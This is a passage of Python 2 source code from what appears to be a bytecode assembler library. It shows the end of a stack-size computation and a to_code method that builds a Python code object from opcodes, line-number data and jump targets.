602 | 
603 |             elif python_version == '2.7' and op == SETUP_WITH:
604 |                 yield label_pos[arg], curstack
605 |                 yield pos+1, newstack(-1) + (1,)
606 | 
607 |             elif op == POP_BLOCK:
608 |                 # Just pop the block
609 |                 yield pos+1, curstack[:-1]
610 | 
611 |             elif op == END_FINALLY:
612 |                 # Since stack recording of SETUP_FINALLY targets is of 3 pushed
613 |                 # objects (as when an exception is raised), we pop 3 objects.
614 |                 yield pos+1, newstack(-3)
615 | 
616 |             elif op == WITH_CLEANUP:
617 |                 # Since WITH_CLEANUP is always found after SETUP_FINALLY
618 |                 # targets, and the stack recording is that of a raised
619 |                 # exception, we can simply pop 1 object and let END_FINALLY
620 |                 # pop the remaining 3.
621 |                 if python_version == '2.7':
622 |                   yield pos+1, newstack(2)
623 |                 else:
624 |                   yield pos+1, newstack(-1)
625 | 
626 |             else:
627 |                 assert False, "Unhandled opcode: %r" % op
628 | 
629 | 
630 |         # Now comes the calculation: open_positions holds positions which are
631 |         # yet to be explored. In each step we take one open position, and
632 |         # explore it by adding the positions to which you can get from it, to
633 |         # open_positions. On the way, we update maxsize.
634 |         # open_positions is a list of tuples: (pos, stack state)
635 |         maxsize = 0
636 |         open_positions = [(0, (0,))]
637 |         while open_positions:
638 |             pos, curstack = open_positions.pop()
639 |             maxsize = max(maxsize, sum(curstack))
640 |             open_positions.extend(get_next_stacks(pos, curstack))
641 | 
642 |         return maxsize
643 | 
644 |     def to_code(self):
645 |         """Assemble a Python code object from a Code object."""
646 |         co_argcount = len(self.args) - self.varargs - self.varkwargs
647 |         co_stacksize = self._compute_stacksize()
648 |         co_flags = self._compute_flags()
649 | 
650 |         co_consts = [self.docstring]
651 |         co_names = []
652 |         co_varnames = list(self.args)
653 | 
654 |         co_freevars = tuple(self.freevars)
655 | 
656 |         # We find all cellvars beforehand, for two reasons:
657 |         # 1. We need the number of them to construct the numeric argument
658 |         #    for ops in "hasfree".
659 |         # 2. We need to put arguments which are cell vars in the beginning
660 |         #    of co_cellvars
661 |         cellvars = set(arg for op, arg in self.code
662 |                        if isopcode(op) and op in hasfree
663 |                        and arg not in co_freevars)
664 |         co_cellvars = [x for x in self.args if x in cellvars]
665 | 
666 |         def index(seq, item, eq=operator.eq, can_append=True):
667 |             """Find the index of item in a sequence and return it.
668 |             If it is not found in the sequence, and can_append is True,
669 |             it is appended to the sequence.
670 | 
671 |             eq is the equality operator to use.
672 |             """
673 |             for i, x in enumerate(seq):
674 |                 if eq(x, item):
675 |                     return i
676 |             else:
677 |                 if can_append:
678 |                     seq.append(item)
679 |                     return len(seq) - 1
680 |                 else:
681 |                     raise IndexError, "Item not found"
682 | 
683 |         # List of tuples (pos, label) to be filled later
684 |         jumps = []
685 |         # A mapping from a label to its position
686 |         label_pos = {}
687 |         # Last SetLineno
688 |         lastlineno = self.firstlineno
689 |         lastlinepos = 0
690 | 
691 |         co_code = array('B')
692 |         co_lnotab = array('B')
693 |         for i, (op, arg) in enumerate(self.code):
694 |             if isinstance(op, Label):
695 |                 label_pos[op] = len(co_code)
696 | 
697 |             elif op is SetLineno:
698 |                 incr_lineno = arg - lastlineno
699 |                 incr_pos = len(co_code) - lastlinepos
700 |                 lastlineno = arg
701 |                 lastlinepos = len(co_code)
702 | 
703 |                 if incr_lineno == 0 and incr_pos == 0:
704 |                     co_lnotab.append(0)
705 |                     co_lnotab.append(0)
706 |                 else:
707 |                     while incr_pos > 255:
708 |                         co_lnotab.append(255)
709 |                         co_lnotab.append(0)
710 |                         incr_pos -= 255
711 |                     while incr_lineno > 255:
712 |                         co_lnotab.append(incr_pos)
713 |                         co_lnotab.append(255)
714 |                         incr_pos = 0
715 |                         incr_lineno -= 255
716 |                     if incr_pos or incr_lineno:
717 |                         co_lnotab.append(incr_pos)
718 |                         co_lnotab.append(incr_lineno)
719 | 
720 |             elif op == opcode.EXTENDED_ARG:
721 |                 raise ValueError, "EXTENDED_ARG not supported in Code objects"
722 | 
723 |             elif not op in hasarg:
724 |                 co_code.append(op)
725 | 
726 |             else:
727 |                 if op in hasconst:
728 |                     if isinstance(arg, Code) and i < len(self.code)-1 and \
729 |                        self.code[i+1][0] in hascode:
730 |                         arg = arg.to_code()
731 |                     arg = index(co_consts, arg, operator.is_)
732 |                 elif op in hasname:
733 |                     arg = index(co_names, arg)
734 |                 elif op in hasjump:
735 |                     # arg will be filled later
736 |                     jumps.append((len(co_code), arg))
737 |                     arg = 0
738 |                 elif op in haslocal:
739 |                     arg = index(co_varnames, arg)
740 |                 elif op in hascompare:
741 |                     arg = index(cmp_op, arg, can_append=False)
742 |                 elif op in hasfree:
743 |                     try:
744 |                         arg = index(co_freevars, arg, can_append=False) \
745 |                               + len(cellvars)
746 |                     except IndexError:
747 |                         arg = index(co_cellvars, arg)
748 |                 else:
749 |                     # arg is ok
750 |                     pass
751 | 
752 |                 if arg > 0xFFFF:
753 |                     co_code.append(opcode.EXTENDED_ARG)
754 |                     co_code.append((arg >> 16) & 0xFF)
755 |                     co_code.append((arg >> 24) & 0xFF)
756 |                 co_code.append(op)
757 |                 co_code.append(arg & 0xFF)
758 |                 co_code.append((arg >> 8) & 0xFF)
759 | 
760 |         for pos, label in jumps:
761 |             jump = label_pos[label]
762 |             if co_code[pos] in hasjrel:
763 |                 jump -= pos+3
764 |             if jump > 0xFFFF:
765 |                 raise NotImplementedError, "Extended jumps not implemented"
766 |             co_code[pos+1] = jump & 0xFF
767 |             co_code[pos+2] = (jump >> 8) & 0xFF
768 | 
769 |         co_code = co_code.tostring()
770 |         co_lnotab = co_lnotab.tostring()
771 | 
772 |         co_consts = tuple(co_consts)
773 |         co_names = tuple(co_names)
774 |         co_varnames = tuple(co_varnames)
775 |         co_nlocals = len(co_varnames)
776 |         co_cellvars = tuple(co_cellvars)
777 | 
778 |         return types.CodeType(co_argcount, co_nlocals, co_stacksize, co_flags,
779 |                               co_code, co_consts, co_names, co_varnames,
780 |                               self.filename, self.name, self.firstlineno, co_lnotab,
781 |                               co_freevars, co_cellvars)
782 | 


--------------------------------------------------------------------------------